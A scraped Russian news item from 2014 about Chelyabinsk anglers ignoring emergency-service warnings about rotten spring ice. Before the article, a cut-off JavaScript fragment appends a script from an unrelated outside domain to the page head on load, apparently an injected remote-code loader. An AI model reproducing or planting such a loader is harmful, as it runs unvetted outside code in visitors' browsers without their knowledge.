, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Несмотря на потепление многие челябинские рыбаки продолжают выходить на лед

Для того, чтобы предупредить рыболовов об опасности, регулярно проводятся рейды с участием сотрудников МЧС. Несмотря на многочисленные предупреждения в средствах массовой информации о коварстве весеннего льда, челябинцы по-прежнему с риском для жизни выходят на водоемы.

Права штрафовать за выход на лед инспекторы МЧС лишены, поэтому им приходится только предупреждать рыбаков о существующей опасности и раздавать памятки. Однако многие любители рыбалки, получив такую памятку, остаются сидеть на своем месте.

Спасатели сетуют, что несмотря на их усилия, многие рыбаки не понимают всей опасности нахождения на льду в такую погоду. Ночью он подмерзает, а днем подтаивает. Из-за того, что лед постоянно меняет свою структуру, он становится рыхлым. А это значит, что ценой улова может стать жизнь рыболова.

 

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
16:34 - 23 марта 2014
|
автор: U-RSS
|
(407)
|
(0)

Комментарии (0)

Я человек
Я бот